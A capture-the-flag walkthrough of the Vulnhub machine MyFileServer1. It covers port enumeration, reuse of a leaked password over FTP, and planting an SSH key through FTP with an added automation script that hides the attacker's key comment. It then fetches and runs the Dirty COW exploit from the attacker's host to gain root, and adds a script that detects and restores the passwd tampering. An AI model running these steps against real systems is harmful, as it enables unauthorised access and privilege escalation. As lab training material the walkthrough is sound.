[VLN] MyFileServer1

Today we are going to hack the Vulnhub machine called MyFileServer1. You can download it from the following link: MyFileServer1

Enumeration


We start with an nmap scan of all TCP ports to see which ones are open.

sml@Cassandra:~$ nmap -p- -A 192.168.1.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-27 11:03 CET
Nmap scan report for fileserver.home (192.168.1.85)
Host is up (0.00055s latency).
Not shown: 64523 filtered ports, 1004 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19 07:48 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.148
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
|   256 b8:db:2c:ca:e2:70:c3:eb:9a:a8:cc:0e:a2:1c:68:6b (ECDSA)
|_  256 66:a3:1b:55:ca:c2:51:84:41:21:7f:77:40:45:d4:9f (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: My File Server
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      40143/udp   nlockmgr
|   100021  1,3,4      44733/tcp6  nlockmgr
|   100021  1,3,4      45664/udp6  nlockmgr
|   100021  1,3,4      60055/tcp   nlockmgr
|   100024  1          34834/udp   status
|   100024  1          39810/udp6  status
|   100024  1          44480/tcp   status
|   100024  1          60715/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open  mountd      1-3 (RPC #100005)
Service Info: Host: FILESERVER; OS: Unix

Host script results:
|_clock-skew: mean: -1h50m00s, deviation: 3h10m30s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2020-03-27T15:34:27+05:30
| smb-security-mode: 
|   account_used: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-27T10:04:26
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.05 seconds
We can see that it has a lot of ports open (two FTP daemons, SSH, HTTP, NFS and Samba), so it is time to see what information we can pull out of each of them.

sml@Cassandra:~$ nikto -h http://192.168.1.85
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.85
+ Target Hostname:    192.168.1.85
+ Target Port:        80
+ Start Time:         2020-03-27 11:07:43 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8724 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-03-27 11:08:36 (GMT1) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto finds the file readme.txt; opening http://192.168.1.85/readme.txt gives us the following text: My Password is rootroot1. (Nikto's "outdated" warning is based on the version string alone; CentOS backports fixes into its Apache 2.4.6 package, so that line is noise here.) We keep looking for more information that might be useful.

sml@Cassandra:/tmp$ smbmap -H 192.168.1.85
[+] IP: 192.168.1.85:445        Name: fileserver.home

        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        smbdata                                                 READ, WRITE     smbdata
        smbuser                                                 NO ACCESS       smbuser
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.1)
We can see that Samba exposes two shares of interest, one called smbdata (readable and writable by a null session) and another called smbuser. The second one reads like an account name, so we recurse into the one we can open.

sml@Cassandra:/tmp$ smbmap -H 192.168.1.85 -R
[+] IP: 192.168.1.85:445        Name: fileserver.home

        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        smbdata                                                 READ, WRITE     smbdata
        .\smbdata\*
        dr--r--r--                0 Fri Mar 27 11:23:08 2020    .
        dr--r--r--                0 Tue Feb 18 12:47:54 2020    ..
        dr--r--r--                0 Tue Feb 18 12:48:15 2020    anaconda
        dr--r--r--                0 Tue Feb 18 12:48:15 2020    audit
        fr--r--r--             6120 Tue Feb 18 12:48:16 2020    boot.log
        fr--r--r--              384 Tue Feb 18 12:48:16 2020    btmp
        fr--r--r--             4813 Tue Feb 18 12:48:16 2020    cron
        fr--r--r--            31389 Tue Feb 18 12:48:16 2020    dmesg
        fr--r--r--            31389 Tue Feb 18 12:48:16 2020    dmesg.old
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    glusterfs
        fr--r--r--           292292 Tue Feb 18 12:48:16 2020    lastlog
        fr--r--r--             1982 Tue Feb 18 12:48:16 2020    maillog
        fr--r--r--           684379 Tue Feb 18 12:48:16 2020    messages
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    ppp
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    samba
        fr--r--r--            11937 Tue Feb 18 12:48:16 2020    secure
        fr--r--r--                0 Tue Feb 18 12:48:16 2020    spooler
        fr--r--r--                0 Tue Feb 18 12:48:16 2020    tallylog
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    tuned
        fr--r--r--            25728 Tue Feb 18 12:48:17 2020    wtmp
        fr--r--r--              100 Tue Feb 18 12:48:17 2020    xferlog
        fr--r--r--            10915 Tue Feb 18 12:48:17 2020    yum.log
        fr--r--r--             3906 Wed Feb 19 08:46:38 2020    sshd_config
        .\smbdata\anaconda\*
        dr--r--r--                0 Tue Feb 18 12:48:15 2020    .
        dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
        fr--r--r--            21532 Tue Feb 18 12:48:15 2020    anaconda.log
        fr--r--r--            66090 Tue Feb 18 12:48:15 2020    syslog
        fr--r--r--            22750 Tue Feb 18 12:48:15 2020    anaconda.xlog
        fr--r--r--            25353 Tue Feb 18 12:48:15 2020    anaconda.program.log
        fr--r--r--           123159 Tue Feb 18 12:48:15 2020    anaconda.packaging.log
        fr--r--r--            95767 Tue Feb 18 12:48:15 2020    anaconda.storage.log
        fr--r--r--             1894 Tue Feb 18 12:48:15 2020    anaconda.ifcfg.log
        fr--r--r--                0 Tue Feb 18 12:48:15 2020    ks-script-JI8Xco.log
        fr--r--r--                0 Tue Feb 18 12:48:15 2020    ks-script-vT7qk9.log
        .\smbdata\audit\*
        dr--r--r--                0 Tue Feb 18 12:48:15 2020    .
        dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
        fr--r--r--           840450 Tue Feb 18 12:48:16 2020    audit.log
        .\smbdata\samba\*
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    .
        dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    old
        fr--r--r--              168 Tue Feb 18 12:48:16 2020    log.smbd
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    cores
        .\smbdata\samba\cores\*
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    .
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    ..
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    smbd
        .\smbdata\tuned\*
        dr--r--r--                0 Tue Feb 18 12:48:16 2020    .
        dr--r--r--                0 Fri Mar 27 11:23:08 2020    ..
        fr--r--r--            15722 Tue Feb 18 12:48:16 2020    tuned.log
        smbuser                                                 NO ACCESS       smbuser
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.1)
After going through every port, all we have is a likely username, smbuser (taken from the share name), and the password rootroot1 from readme.txt. We try that pair against the services that take a login and find that the vsftpd on port 21 accepts smbuser/rootroot1. The copy of sshd_config in the smbdata share, modified a day later than everything else in it, is also worth reading before deciding how to turn that access into a shell.

Low shell



sml@Cassandra:~$ ftp 192.168.1.85 
Connected to 192.168.1.85.
220 (vsFTPd 3.0.2)
Name (192.168.1.85:sml): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Logging into the FTP as smbuser we see that we are apparently in that user's home directory (the 257 reply to mkdir below confirms the path /home/smbuser), so we copy our SSH public key (id_rsa.pub) to a file called authorized_keys and upload it over FTP into smbuser's .ssh directory, creating the .ssh directory over FTP first, as shown below. As long as the directory and the file end up neither group- nor world-writable, sshd's StrictModes accepts them without any chmod, which the key login afterwards confirms.

sml@Cassandra:~$ cp .ssh/id_rsa.pub authorized_keys
sml@Cassandra:~$ ftp 192.168.1.85 
Connected to 192.168.1.85.
220 (vsFTPd 3.0.2)
Name (192.168.1.85:sml): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir .ssh
257 "/home/smbuser/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
567 bytes sent in 0.00 secs (22.5306 MB/s)
Once that is done we connect over ssh :)

sml@Cassandra:~$ ssh smbuser@192.168.1.85
   
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    My File Server - 1                                      #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################

Last login: Fri Mar 27 17:20:37 2020 from cassandra.home
[smbuser@fileserver ~]$ id
uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)
[smbuser@fileserver ~]$
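The key drop above is done by hand in an interactive ftp session. The script below is an added example, not part of the original writeup, that does the same thing non-interactively and then checks that the resulting SSH login works. It assumes what the session above shows: the FTP account's root is the user's home directory, and sshd on the target honours ~/.ssh/authorized_keys. The host, user and password are the writeup's; the key file paths and the function names are this example's own.

```shell
#!/bin/sh
# Added example (not the writeup's code): push an SSH public key into a user's
# home over FTP and verify the passwordless login.
# Assumes the FTP root is the user's home (as "257 /home/smbuser/.ssh created"
# above shows) and that sshd honours ~/.ssh/authorized_keys.

# Print one validated authorized_keys line from a public key file.
# Returns 1 if the file does not look like an OpenSSH public key.
key_line() {
    line=$(head -n 1 "$1")
    case "$line" in
        "ssh-ed25519 "*|"ssh-rsa "*|"ecdsa-sha2-nistp256 "*) ;;
        *) echo "not an OpenSSH public key: $1" >&2; return 1 ;;
    esac
    # Drop the comment field so no hint about the attacking host is left behind.
    printf '%s %s\n' "$(printf '%s' "$line" | cut -d' ' -f1)" \
                     "$(printf '%s' "$line" | cut -d' ' -f2)"
}

# Emit the FTP command batch that creates ~/.ssh and uploads the key file
# under the name sshd expects.
ftp_batch() {
    printf 'mkdir .ssh\ncd .ssh\nput %s authorized_keys\nquit\n' "$1"
}

# Upload the key and test the resulting SSH login without a password.
# Usage: ftp_key_drop <host> <user> <password> <pubkey-file> <privkey-file>
ftp_key_drop() {
    host=$1 user=$2 pass=$3 pub=$4 priv=$5
    tmp=$(mktemp) || return 1
    key_line "$pub" > "$tmp" || { rm -f "$tmp"; return 1; }
    # -i: no per-file prompts, -n: no auto-login (we send "user" ourselves),
    # -v: show the server replies so a failed mkdir/put is visible.
    {
        printf 'user %s %s\n' "$user" "$pass"
        ftp_batch "$tmp"
    } | ftp -inv "$host"
    rm -f "$tmp"
    # BatchMode=yes makes ssh fail instead of falling back to a password prompt,
    # so a non-zero exit here means the key was not accepted.
    ssh -o BatchMode=yes -o StrictHostKeyChecking=no -i "$priv" "$user@$host" id
}

# Example call matching the writeup (hypothetical key paths):
#   ftp_key_drop 192.168.1.85 smbuser rootroot1 ~/.ssh/id_rsa.pub ~/.ssh/id_rsa
```

Stripping the comment field matters on an assessment: the default comment is user@hostname of the machine that generated the key, and it would otherwise sit in the victim's authorized_keys for the next person who reads it.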

Privilege Escalation


Once inside the system we download the script[1] so that it suggests an exploit that might work on this box, serving it from a web server on the attacking machine.

[smbuser@fileserver ~]$ cd /tmp
[smbuser@fileserver tmp]$ wget http://192.168.1.148/lin.sh
--2020-03-27 17:27:52--  http://192.168.1.148/lin.sh
Connecting to 192.168.1.148:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84245 (82K) [application/octet-stream]
Saving to: 'lin.sh'

100%[==========================================================================>] 84,245      --.-K/s   in 0.001s

2020-03-27 17:27:52 (114 MB/s) - 'lin.sh' saved [84245/84245]

[smbuser@fileserver tmp]$ sh lin.sh

Available information:

Kernel version: 3.10.0
Architecture: x86_64
Distribution: RHEL
Distribution version: 7
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

73 kernel space exploits
45 user space exploits

Possible Exploits:

[+] [CVE-2016-5195] dirtycow

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},[ RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7} ],ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,[ RHEL=5|6|7 ],ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

[+] [CVE-2017-1000367] Sudoer-to-root

   Details: https://www.sudo.ws/alerts/linux_tty.html
   Exposure: probable
   Tags: [ RHEL=7 ]{sudo:1.8.6p7}
   Download URL: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
   Comments: Needs to be sudoer. Works only on SELinux enabled systems

--SNIP--
It suggests several; the kernel is 3.10.0 on RHEL/CentOS 7, which matches the Dirty COW tags, so we go with[2] [CVE-2016-5195] dirtycow 2 (the sudo one needs sudoer rights that smbuser does not have).

[smbuser@fileserver tmp]$ wget http://192.168.1.148/40839.c
--2020-03-27 17:30:44--  http://192.168.1.148/40839.c
Connecting to 192.168.1.148:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [application/octet-stream]
Saving to: '40839.c'

100%[==========================================================================>] 5,006       --.-K/s   in 0s

2020-03-27 17:30:44 (756 MB/s) - '40839.c' saved [5006/5006]

[smbuser@fileserver tmp]$ mv 40839.c dirty.c
[smbuser@fileserver tmp]$ gcc -pthread dirty.c -o dirty -lcrypt
[smbuser@fileserver tmp]$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fiWZ83NyER86M:0:0:pwned:/root:/bin/bash

mmap: 7f5c984d8000
Once the exploit is running, we open another ssh connection (in parallel, because the exploit process keeps the first session busy) and log in as firefart with the password we just typed to get root privileges. Note what 40839.c actually did: it saved a copy of /etc/passwd to /tmp/passwd.bak and then raced the kernel to overwrite the root entry with the firefart line, which is why the new account has uid 0. Restore that backup once you are done, otherwise the real root account stays replaced.

sml@Cassandra:~$ ssh smbuser@192.168.1.85
[smbuser@fileserver ~]$ su firefart
Password: 
[firefart@fileserver smbuser]# id
uid=0(firefart) gid=0(root) groups=0(root)
[firefart@fileserver smbuser]# cd /root
[firefart@fileserver ~]# ls
proof.txt
[firefart@fileserver ~]# cat proof.txt 
Best of Luck
af52e0163b03cbf7c6dd146351594a43
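What 40839.c leaves behind is also exactly what a defender, or the tester cleaning up afterwards, should look for: a second uid-0 account and a password hash sitting inline in /etc/passwd instead of in /etc/shadow. The script below is an added example, not part of the original writeup, with the checks and the restore step. The file paths are the ones the exploit output above prints; the passwd contents used in the test are constructed and simplified (the real overwrite also clobbers part of the line that followed root's).

```shell
#!/bin/sh
# Added example (not the writeup's code): post-exploitation checks for the
# traces 40839.c leaves in /etc/passwd, plus the restore the exploit expects.
# Paths come from the exploit output above; sample contents are constructed.

# Print every account whose uid is 0. On a healthy box only "root" appears.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# Print accounts that carry a real hash inside /etc/passwd itself: field 2 is
# neither "x" (delegated to /etc/shadow) nor a lock marker made of "!" or "*".
# A shadowed system should print nothing; 40839.c leaves one such entry.
inline_hashes() {
    awk -F: '$2 != "x" && $2 !~ /^[!*]+$/ && $2 != "" { print $1 ":" $2 }' "$1"
}

# Show how the live file drifted from the backup the exploit wrote
# (< backup, > live). Exit status is diff's: 0 identical, 1 different.
passwd_drift() {
    diff "$1" "$2"
}

# Restore the backup, keeping the tampered file as evidence for the report.
# Usage: restore_passwd /tmp/passwd.bak /etc/passwd /root/passwd.tampered
restore_passwd() {
    backup=$1 live=$2 evidence=$3
    cp "$live" "$evidence" && cp "$backup" "$live"
}

# Example run on the target after the exploit (needs uid 0):
#   uid0_accounts /etc/passwd          # expect: firefart (root is gone)
#   inline_hashes /etc/passwd          # expect: firefart:<crypt hash>
#   passwd_drift /tmp/passwd.bak /etc/passwd
#   restore_passwd /tmp/passwd.bak /etc/passwd /root/passwd.tampered
```

The 13-character hash in the firefart line ("fiWZ83NyER86M", salt "fi") is traditional DES crypt, which is what the exploit's call to crypt() with a two-character salt produces; any entry like it in /etc/passwd on a CentOS 7 box is a finding on its own, before you even compare uids.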

End


And with that we are root on the machine :)

[1] https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh
[2] https://www.exploit-db.com/exploits/40839